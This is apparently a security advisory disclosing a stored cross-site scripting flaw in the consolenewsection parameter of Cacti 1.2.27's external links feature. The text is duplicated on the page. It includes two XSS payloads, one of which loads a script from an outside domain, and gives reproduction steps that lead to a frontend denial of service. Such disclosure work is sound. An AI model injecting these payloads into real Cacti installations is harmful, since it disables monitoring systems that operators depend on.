Summary
consolenewsection parameter is not properly sanitized when saving external links in links.php . Morever, the said consolenewsection parameter is stored in the database and reflected back to user in index.php, finally leading to stored XSS.
Details
Users with the privilege to create external links can manipulate the “consolenewsection” parameter in the http post request while creating external links to perform stored XSS attacks. The vulnerability known as XSS (Cross-Site Scripting) occurs when an application allows untrusted user input to be displayed on a web page without proper validation or escaping.
The screenshot below shows the tester entered the payload <svg/onload=alert()> to prove the existence of the XSS vulnerability.
The screenshot below shows the http post request that was sent. As seen, the payload resides in the consolenewsection parameter.
The screenshot below shows that the external link is created in the console menu and is visible there. It also shows the version of Cacti under test which is 1.2.27.
The screenshot below shows that the alert box popped up, therefore, the existence of the XSS vulnerability is proven.
This xss vulnerability has its limitations due to the fact that the aforementioned consolenewsection parameter does not allow long strings to be entered. Therefore, in its current state of the payload, this vulnerability does not have an impact on neither confidentiality nor integrity. However, as seen in the screenshots below, the following payload <script/src=//⑮.rs causes denial of service in the frontend thereby rendering the application unavailable.
As seen in the screenshot below, clicking the items (valid for all items in the console menu) in the console menu no longer shows the returned data. One cannot even delete the external link causing the issue. I had to delete the external link information from the database to be able to resume normal operations.
Below is the screenshot of the vulnerable code.
PoC
Payload1: <svg/onload=alert()>
Payload2: <script/src=//⑮.rs
- Go to External Links under Utilities menu.
- Click on + sign to add a new external link.
- Choose Console Menu as style.
- Choose New Name Below as Console Menu Section.
- Add payload1 or payload2 as New Console Section (this is the consolenewsection parameter)
- Give a Tab/Menu Name.
- Add a random Web URL Location.
- Click on save.
- Finally, click on Main Console (index.php) to trigger the XSS (one may need to refresh the page).
Impact
Denial of Service
TayfunYelim Reporter
Summary
consolenewsectionparameter is not properly sanitized when saving external links in links.php . Morever, the said consolenewsection parameter is stored in the database and reflected back to user inindex.php, finally leading to stored XSS.Details
Users with the privilege to create external links can manipulate the “consolenewsection” parameter in the http post request while creating external links to perform stored XSS attacks. The vulnerability known as XSS (Cross-Site Scripting) occurs when an application allows untrusted user input to be displayed on a web page without proper validation or escaping.
The screenshot below shows the tester entered the payload
<svg/onload=alert()>to prove the existence of the XSS vulnerability.The screenshot below shows the http post request that was sent. As seen, the payload resides in the
consolenewsectionparameter.The screenshot below shows that the external link is created in the console menu and is visible there. It also shows the version of Cacti under test which is 1.2.27.
The screenshot below shows that the alert box popped up, therefore, the existence of the XSS vulnerability is proven.
This xss vulnerability has its limitations due to the fact that the aforementioned consolenewsection parameter does not allow long strings to be entered. Therefore, in its current state of the payload, this vulnerability does not have an impact on neither confidentiality nor integrity. However, as seen in the screenshots below, the following payload
<script/src=//⑮.rscauses denial of service in the frontend thereby rendering the application unavailable.As seen in the screenshot below, clicking the items (valid for all items in the console menu) in the console menu no longer shows the returned data. One cannot even delete the external link causing the issue. I had to delete the external link information from the database to be able to resume normal operations.
Below is the screenshot of the vulnerable code.
PoC
Payload1: <svg/onload=alert()>
Payload2: <script/src=//⑮.rs
Impact
Denial of Service